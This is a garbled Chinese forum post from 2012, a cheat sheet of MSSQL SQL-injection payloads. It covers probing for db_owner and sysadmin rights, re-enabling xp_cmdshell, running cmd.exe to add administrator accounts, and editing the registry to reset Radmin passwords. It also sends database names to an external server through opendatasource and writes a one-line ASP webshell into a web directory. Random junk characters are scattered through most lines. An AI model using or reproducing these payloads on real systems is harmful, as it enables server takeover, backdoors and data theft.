//看看是什么权限的
$ }4 m+ L6 y3 y" _9 U. zand 1=(Select IS_MEMBER('db_owner'))& S- i' U; d+ W& \
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
( ?9 j2 u5 A, {3 {+ j9 K# d) R
5 o9 w2 w }; B//检测是否有读取某数据库的权限
* s( b }* ~" d; g! Y0 _and 1= (Select HAS_DBACCESS('master'))
6 c6 I) |, X" W7 ^) g; m2 ^8 hAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
1 S7 U! a' u( u! U Z$ H" V% y+ ~" o+ s# N2 F/ ?, I" w0 K0 G
9 o& v- \1 X5 w, v; X F数字类型9 t! P% c7 y2 r5 E" b
and char(124)%2Buser%2Bchar(124)=0
3 X4 @# E' U. j6 y# j% B( M' Y
6 v: b. \' |5 p, Y7 a% Q字符类型
2 [! }# m; S/ ~( q' and char(124)%2Buser%2Bchar(124)=0 and ''='
6 X' K( q% S: k5 m6 Q4 ~. @$ p$ e+ C( y! [, ^- i' \' F
搜索类型7 P. X( V8 \5 @9 Q5 O3 z
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
% K; P6 v" L) L# e% b
# k# e4 `$ }4 f: ~爆用户名
6 a" f8 |4 L4 o9 p& Vand user>0
5 m! _- b) S4 H, D6 d% ?0 p' and user>0 and ''='
: D8 d8 \' h% s1 P; G" e K/ D5 ?6 r. n9 U1 k
检测是否为SA权限
' v$ _! Y9 f$ dand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
3 k3 I4 f( J* ]7 IAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
7 B7 [$ N ~9 ]% W; i6 m# D* x, x; M1 @- Z
检测是不是MSSQL数据库
7 Y% n1 ~9 N3 l: p' N4 S. ]and exists (select * from sysobjects);--
' B, C6 U: A, {- N' \9 ?
2 q" {! G5 l, O8 _7 e! j4 u) ]0 D) I检测是否支持多行8 w! U V+ }: P0 }
;declare @d int;--
8 x! X0 }& O6 S# d4 f: F/ R' ^
% ~7 U# A9 m) p0 `% K恢复 xp_cmdshell
" J6 A" |2 h7 B; t; V;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
3 v# j4 M( ?2 Q( D/ m7 w7 M: B# c S
* M3 p" E& N+ @* i, M
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
9 b; Z1 I9 v, |. _ y& r3 \* p$ v( ~' V6 Y1 {1 M; z: c
//-----------------------
6 b7 E+ D9 n0 y1 ]: w+ q% J, x0 ~" k// 执行命令
" K, S. F& @& ~" H- B! b# Z k//-----------------------
/ Q+ p5 E7 P, _# X首先开启沙盘模式:# p8 E. I! H5 f5 a: m- e) e( [
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
. h) q0 }, I9 F. C" v' f; n! I# ~: l7 }7 p
然后利用jet.oledb执行系统命令
1 R; L1 A2 M" R) a- C: N rselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
3 X! i$ [/ L6 l* t# a0 d! D# H; o" `2 I* {
执行命令: ^: L1 y& E1 P: \3 U
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
i# } [. o! \4 [# P! s' y+ ^; k" p5 ~
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
6 a r' } L0 X/ ?; W6 m* J S# A& `- @ [
判断xp_cmdshell扩展存储过程是否存在:7 s$ a! `# ]- t. S2 y* Q5 o
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')( v4 Z5 e8 B, R' z# Q
* q6 X# a4 o" F9 {$ M. G" y写注册表( S e5 k/ I: z$ }1 }7 L: h+ A
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1( X4 b# {" }( D8 p, G2 H9 }/ o
5 Z/ N4 k ^* d* S
REG_SZ7 t% L, ?! b8 M5 r) @3 H. ~% N
6 U# ~2 L2 x& E3 m5 q. W ?读注册表
: e6 h a0 l) [( d5 w, b/ J8 ^+ qexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
& h* B1 P" i+ o+ E9 w# V0 s D8 f
读取目录内容
) D+ m( ]- f) V1 ^0 rexec master..xp_dirtree 'c:\winnt\system32\',1,1
0 D) X4 R6 L' ~& }( W# t4 c4 S2 }' X6 [" l% Y7 j
0 l2 @0 K, T! E! e
数据库备份/ U; q8 s6 }# U" t
backup database pubs to disk = 'c:\123.bak'0 T" P: S/ `% h4 F: Z! h$ Y! }2 a
$ K2 s6 E: E* d
//爆出长度
9 `9 \5 n; c. W4 mAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--) N" Y. B$ I3 K l" Y$ b0 F4 z2 Z
3 _" ~/ I' w! g; ^" Q9 y
6 ^- T; Z( w: }0 W+ h- P7 a( d& i/ _ @0 u
更改sa口令方法:用sql综合利用工具连接后,执行命令:9 ]) m) |' E6 L9 D" p
exec sp_password NULL,'新密码','sa'
4 Q3 P6 E2 ?6 ]- x2 B `8 K$ g( {5 ^8 E# B7 i
添加和删除一个SA权限的用户test:
0 c' z2 j Z$ g8 xexec master.dbo.sp_addlogin test,9530772/ ]/ \$ J3 G: z3 L; i1 b
exec master.dbo.sp_addsrvrolemember test,sysadmin* L9 V. @8 f* d/ a- O( U p, @! I6 g
/ m; z" I. c! g删除扩展存储过过程xp_cmdshell的语句:- N- W" {; _: ^
exec sp_dropextendedproc 'xp_cmdshell'
# D3 ?0 V8 s, W# [ W( l# \6 n- o$ [; ~/ f- C, a y
添加扩展存储过过程& j9 c1 _. K' I- o# K. b. Q
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'/ ^1 v& U1 i, { J0 P3 Y
GRANT exec On xp_proxiedadata TO public
5 `1 B) d# v7 \8 n+ i
. j; E9 G( w/ V8 H( q9 ?2 |0 {$ [4 ]; p1 p" j, s
停掉或激活某个服务。& c: v7 m$ _$ p( z' |0 a+ M- y4 x
6 D% P" _3 Z) D2 }% m0 ?exec master..xp_servicecontrol 'stop','schedule'# g9 r2 S& d J% |& |! O, ?! S6 B3 e
exec master..xp_servicecontrol 'start','schedule'
5 Z# K( Z+ p1 Y% N9 c ] F# g* e4 Z6 ?8 }$ P, s
dbo.xp_subdirs
( p" x8 D$ X; f4 u, Y: I8 M' l
" P1 t' B9 B# H- i: U只列某个目录下的子目录。
; b. `, k9 a# ^) Lxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
% d* o2 _, L0 X
! L) G) U6 d5 H2 m9 udbo.xp_makecab
5 t" J8 D2 y9 O8 a- o( K, j. r
. K* i) e1 @/ t- ?4 b/ v1 S( L2 T将目标多个档案压缩到某个目标档案之内。
M3 X. ] k3 K8 s# `1 C- C所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。+ A3 H1 N; x7 h
) o3 d- p5 A$ J& I% Qdbo.xp_makecab& _* d2 _, n4 k/ W( A7 }
'c:\test.cab','mszip',1,: U; x( P4 X: U+ O2 j. ~
'C:\Inetpub\wwwroot\SQLInject\login.asp'," r$ P' c5 p! |' ]% t, a% L2 B
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
9 L l. Z3 P3 m
}7 b) F7 i! P/ z2 o: txp_terminate_process
6 W: E9 [& L4 F$ c8 k* a5 a7 I, s" I/ y; _9 w v0 W) E
停掉某个执行中的程序,但赋予的参数是 Process ID。
* V! F' \: [; u) f利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
: v/ V8 X7 j+ ~. G; \/ b" q; O- x! o1 D* u8 J* n7 B2 B
xp_terminate_process 2484: U+ h- |; Y' R3 u B
8 f3 N, g) T$ e2 f% I8 b( Vxp_unpackcab
4 h7 w4 e/ p, G6 F: h, w; v A0 M7 p
4 _8 ^6 i! r3 l& B/ T解开压缩档。6 }; Z6 `, a2 c R( R2 A/ h
7 l* H4 x1 g4 L2 B1 Q4 W& ]
xp_unpackcab 'c:\test.cab','c:\temp',1& E% l4 a& I& o3 v
0 \$ y+ S2 o: a8 i4 V2 v$ Q) N& |' O" I1 Q/ J m
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234 p6 ~3 N- t9 ^ o3 J
2 u7 L, z* P4 k# C2 H1 f' gcreate database lcx;% T& Q$ U J0 S, d0 n
Create TABLE ku(name nvarchar(256) null);% r+ o; K1 Z; n: x* N3 v
Create TABLE biao(id int NULL,name nvarchar(256) null);
- N; x. [& l* f% g* X3 a: Q0 J" t
//得到数据库名
, K9 [/ I0 R* u# K T# T5 [: ^) t( ^2 zinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases9 y7 C1 p& B) e
: E# e0 _) K ]
o8 s0 j( ~$ Q//在Master中创建表,看看权限怎样
t, X! @2 P8 O: S- L) P9 D4 ECreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
E$ B: k, Z! n; ^* I% N
: G1 s8 n3 x+ A5 W用 sp_makewebtask直接在web目录里写入一句话马:& I! i& R& k0 u7 B) s
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
& F: [+ S: G. e- N
8 z3 N* g2 b3 _$ Q6 O' {. u' E//更新表内容/ l+ z' V3 T1 `2 D2 h' v
Update films SET kind = 'Dramatic' Where id = 1234 U& J$ i7 a8 Z6 U: b
, j$ W5 h) k9 k$ E: I' k//删除内容
) ^7 u) j4 y$ Y' G# fdelete from table_name where Stockid = 3 |
发表于 2012-9-15 14:40:13
收藏
支持
反对